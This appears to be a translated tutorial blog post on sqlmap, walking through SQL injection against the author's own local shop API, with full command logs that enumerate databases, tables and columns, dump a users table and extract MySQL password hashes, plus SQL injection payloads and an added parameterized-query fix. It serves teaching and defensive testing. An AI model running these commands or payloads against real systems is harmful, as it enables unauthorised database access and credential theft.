sqlmap

sqlmap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches covering database fingerprinting, fetching data from the database, accessing the underlying file system, and executing commands on the operating system via out-of-band connections.

Installation

pip install sqlmap

Viewing the help

sqlmap -hh

Chinese documentation

https://sqlmap.campfire.ga/

Connecting directly to a database

Server-based database (MySQL)

DBMS://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME

sqlmap -d "mysql://root:123456@127.0.0.1:3306/uniapp_shop" -f --banner --dbs --users

File-based database (SQLite)

DBMS://DATABASE_FILEPATH

sqlmap -d "sqlite3://D:\apiTestDjango\db.sqlite3" -f --banner --dbs --tables

Basic hands-on practice

The service used here runs locally; the purpose is to learn how to use sqlmap. Please do not do anything illegal.

Source code of the scanned project: https://gitee.com/zy7y/uniapp_shop_server

1. Find the injection point

Command: sqlmap -u http://127.0.0.1/v1/getnews?newid=1

(venv) D:\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1
[sqlmap ASCII banner] {1.5.5#pip} http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:34:37 /2021-05-14/

[13:34:37] [INFO] resuming back-end DBMS 'mysql'
[13:34:37] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: newid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: newid=13 AND 6236=6236

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: newid=13 AND (SELECT 8333 FROM (SELECT(SLEEP(5)))cUBu)

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: newid=13 UNION ALL SELECT CONCAT(0x716a6a7a71,0x664e6179557179534a494d4b7a6a4b4263744562646f716151716744516c75476f6774666345424e,0x71786b7a71),NULL,NULL,NULL,NULL-- -
---
[13:34:37] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[13:34:37] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'

[*] ending @ 13:34:37 /2021-05-14/

# Injection point: Title: Generic UNION query (NULL) - 5 columns

2. Enumerate all databases through the injection point: --dbs

Command: sqlmap -u http://127.0.0.1/v1/getnews?newid=1 --dbs

(venv) D:\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1 --dbs
[sqlmap banner {1.5.5#pip} and legal disclaimer omitted; identical to the first run]

[*] starting @ 13:40:12 /2021-05-14/

[13:40:12] [INFO] resuming back-end DBMS 'mysql'
[13:40:12] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: newid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: newid=13 AND 6236=6236

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: newid=13 AND (SELECT 8333 FROM (SELECT(SLEEP(5)))cUBu)

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: newid=13 UNION ALL SELECT CONCAT(0x716a6a7a71,0x664e6179557179534a494d4b7a6a4b4263744562646f716151716744516c75476f6774666345424e,0x71786b7a71),NULL,NULL,NULL,NULL-- -
---
[13:40:12] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[13:40:12] [INFO] fetching database names
available databases [6]:
[*] atplant
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] uniapp_shop

[13:40:12] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'

[*] ending @ 13:40:12 /2021-05-14/

3. List all tables of a given database

Command: sqlmap -u http://127.0.0.1/v1/getnews?newid=1 -D uniapp_shop --tables

(venv) D:\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1 -D uniapp_shop --tables
[sqlmap banner {1.5.5#pip} and legal disclaimer omitted; identical to the first run]

[*] starting @ 14:57:46 /2021-05-14/

[14:57:47] [INFO] resuming back-end DBMS 'mysql'
[14:57:47] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: newid (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: newid=1 AND (SELECT 3711 FROM (SELECT(SLEEP(5)))aMmf)

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: newid=1 UNION ALL SELECT NULL,CONCAT(0x7162626b71,0x456a5258416472737a767a5a6d624b5448444b52745770566c4e67646c58666d474376737a6f476c,0x7170706271),NULL,NULL,NULL-- -
---
[14:57:47] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[14:57:47] [INFO] fetching tables for database: 'uniapp_shop'
Database: uniapp_shop
[36 tables]
+----------------------------+
| dt_article                 |
| dt_article_albums          |
| dt_article_attach          |
| dt_article_attribute_field |
| dt_article_attribute_value |
| dt_article_category        |
| dt_article_comment         |
| dt_brands                  |
| dt_channel                 |
| dt_channel_field           |
| dt_channel_site            |
| dt_express                 |
| dt_feedback                |
| dt_link                    |
| dt_mail_template           |
| dt_manager                 |
| dt_manager_log             |
| dt_manager_role            |
| dt_manager_role_value      |
| dt_navigation              |
| dt_order_goods             |
| dt_orders                  |
| dt_payment                 |
| dt_sms_template            |
| dt_user_amount_log         |
| dt_user_attach_log         |
| dt_user_code               |
| dt_user_group_price        |
| dt_user_groups             |
| dt_user_login_log          |
| dt_user_message            |
| dt_user_oauth              |
| dt_user_oauth_app          |
| dt_user_point_log          |
| dt_user_recharge           |
| dt_users                   |
+----------------------------+

[14:57:47] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'

[*] ending @ 14:57:47 /2021-05-14/

4. Enumerate the columns of a table (MySQL version > 5.0)

Command: sqlmap -u http://127.0.0.1/v1/getnews?newid=1 -D uniapp_shop -T dt_users --columns

(venv) D:\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1 -D uniapp_shop -T dt_users --columns
[sqlmap banner {1.5.5#pip} and legal disclaimer omitted; identical to the first run]

[*] starting @ 14:59:01 /2021-05-14/

[14:59:01] [INFO] resuming back-end DBMS 'mysql'
[14:59:01] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: newid (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: newid=1 AND (SELECT 3711 FROM (SELECT(SLEEP(5)))aMmf)

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: newid=1 UNION ALL SELECT NULL,CONCAT(0x7162626b71,0x456a5258416472737a767a5a6d624b5448444b52745770566c4e67646c58666d474376737a6f476c,0x7170706271),NULL,NULL,NULL-- -
---
[14:59:01] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[14:59:01] [INFO] fetching columns for table 'dt_users' in database 'uniapp_shop'
Database: uniapp_shop
Table: dt_users
[22 columns]
+-----------+--------------+
| Column    | Type         |
+-----------+--------------+
| exp       | int          |
| address   | varchar(255) |
| amount    | double       |
| area      | varchar(255) |
| avatar    | varchar(255) |
| birthday  | timestamp    |
| email     | varchar(50)  |
| group_id  | int          |
| id        | int          |
| mobile    | varchar(20)  |
| msn       | varchar(100) |
| nick_name | varchar(100) |
| password  | varchar(100) |
| point     | int          |
| qq        | varchar(20)  |
| reg_ip    | varchar(20)  |
| reg_time  | timestamp    |
| salt      | varchar(20)  |
| sex       | varchar(20)  |
| status    | int          |
| telphone  | varchar(50)  |
| user_name | varchar(100) |
+-----------+--------------+

[14:59:02] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'

[*] ending @ 14:59:02 /2021-05-14/

5. Dump the data in the table for the given columns

Note: once --dump is used you are already touching the law; do not maliciously attack other people's services.

Command: sqlmap -u http://127.0.0.1/v1/getnews?newid=1 --batch -D uniapp_shop -T dt_users -C user_name,id --dump

(venv) D:\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1 --batch -D uniapp_shop -T dt_users -C user_name,id --dump
[sqlmap banner {1.5.5#pip} and legal disclaimer omitted; identical to the first run]

[*] starting @ 15:03:52 /2021-05-14/

[15:03:52] [INFO] resuming back-end DBMS 'mysql'
[15:03:52] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: newid (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: newid=1 AND (SELECT 3711 FROM (SELECT(SLEEP(5)))aMmf)

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: newid=1 UNION ALL SELECT NULL,CONCAT(0x7162626b71,0x456a5258416472737a767a5a6d624b5448444b52745770566c4e67646c58666d474376737a6f476c,0x7170706271),NULL,NULL,NULL-- -
---
[15:03:52] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[15:03:52] [INFO] fetching entries of column(s) 'id,user_name' for table 'dt_users' in database 'uniapp_shop'
Database: uniapp_shop
Table: dt_users
[1 entry]
+-----------+----+
| user_name | id |
+-----------+----+
| test      | 1  |
+-----------+----+

[15:03:53] [INFO] table 'uniapp_shop.dt_users' dumped to CSV file 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1\dump\uniapp_shop\dt_users.csv'
[15:03:53] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'

[*] ending @ 15:03:53 /2021-05-14/

6. Get the current database users and their password hashes

Command: sqlmap -u http://127.0.0.1/v1/getnews?newid=1 --passwords

(venv) D:\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1 --passwords
[sqlmap banner {1.5.5#pip} and legal disclaimer omitted; identical to the first run]

[*] starting @ 14:40:02 /2021-05-14/

[14:40:02] [INFO] resuming back-end DBMS 'mysql'
[14:40:02] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: newid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: newid=13 AND 6236=6236

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: newid=13 AND (SELECT 8333 FROM (SELECT(SLEEP(5)))cUBu)

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: newid=13 UNION ALL SELECT CONCAT(0x716a6a7a71,0x664e6179557179534a494d4b7a6a4b4263744562646f716151716744516c75476f6774666345424e,0x71786b7a71),NULL,NULL,NULL,NULL-- -
---
[14:40:02] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[14:40:02] [INFO] fetching database users password hashes
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] y
[14:40:05] [WARNING] no clear password(s) found
database management system users password hashes:
[*] develop [1]:
    password hash: $A$005$~W\\u0005K\\u000b\\u0017d\\u0013\\u0002*4j_s Qg\\u0007\\u0015\\u0001GlIeJWW2iJzFpb0bGTlr5.6kBD1hAQt2iQefbUbepKD
[*] mysql.infoschema [1]:
    password hash: $A$005$THISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED
[*] mysql.session [1]:
    password hash: $A$005$THISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED
[*] mysql.sys [1]:
    password hash: $A$005$THISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED
[*] root [2]:
    password hash: $A$005$\\u0013`|dCsg\\u0001^)_s\\u001dL\\u0010n-jx^61Eh8FZrw86xs/5fy7xSwpJ9rmmaZ9iyou1PCK74aRC
    password hash: $A$005$z#r<]P\\u000eneGN\\u0014P_m\\u0007tk&av.YQwaEJ5AqX5Mv9.OiaWV/IlOiYM.C3veKIaAjpwq3

[14:40:05] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'

[*] ending @ 14:40:05 /2021-05-14/
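The runs above report a boolean-based blind and a UNION-query injection in the newid parameter. To show what that finding means at the code level, and what the fix looks like, here is an added example that is not from the original post or the uniapp_shop_server project: a constructed in-memory SQLite stand-in for a getnews?newid= handler, first in the vulnerable string-concatenation form and then in a type-checked, parameterized form. The table and column names are borrowed from the page; the rows and the handler names are constructed.

```python
import sqlite3

# Constructed stand-in for the application database (not the real schema).
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE dt_article (id INTEGER PRIMARY KEY, title TEXT);
INSERT INTO dt_article VALUES (1, 'first post'), (2, 'second post');
CREATE TABLE dt_users (id INTEGER, user_name TEXT, password TEXT);
INSERT INTO dt_users VALUES (1, 'test', 'hash-placeholder');
""")


def get_news_vulnerable(newid: str):
    """The pattern sqlmap detected: the raw query-string value is spliced
    into the SQL text, so 'newid=1 AND 6236=6236' changes the WHERE clause."""
    sql = "SELECT title FROM dt_article WHERE id=" + newid
    return [row[0] for row in conn.execute(sql)]


def get_news_safe(newid: str):
    """Hardened form: enforce the expected type, then bind the value as a
    parameter so the driver never treats it as SQL. Returns None on reject."""
    try:
        ident = int(newid)
    except ValueError:
        return None  # a numeric id must not carry any SQL text
    sql = "SELECT title FROM dt_article WHERE id=?"
    return [row[0] for row in conn.execute(sql, (ident,))]


def probe(handler, newid: str):
    """Run one request through a handler and report the result or DB error."""
    try:
        return handler(newid)
    except sqlite3.Error as exc:
        return f"error: {exc}"


if __name__ == "__main__":
    # The two boolean probes give different answers on the vulnerable handler
    # (that difference is what 'boolean-based blind' means); the safe handler
    # rejects both. The UNION probe appends dt_users data only when vulnerable.
    for newid in ("1", "1 AND 6236=6236", "1 AND 6236=6237",
                  "1 UNION ALL SELECT user_name FROM dt_users"):
        print(f"newid={newid!r}")
        print("  vulnerable:", probe(get_news_vulnerable, newid))
        print("  safe      :", probe(get_news_safe, newid))
```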

Finally

Please do not misuse this tool to attack other people's services or break the law. For advanced usage, see the official documentation.

References

sqlmap Chinese documentation

Practical walkthrough of SQL injection
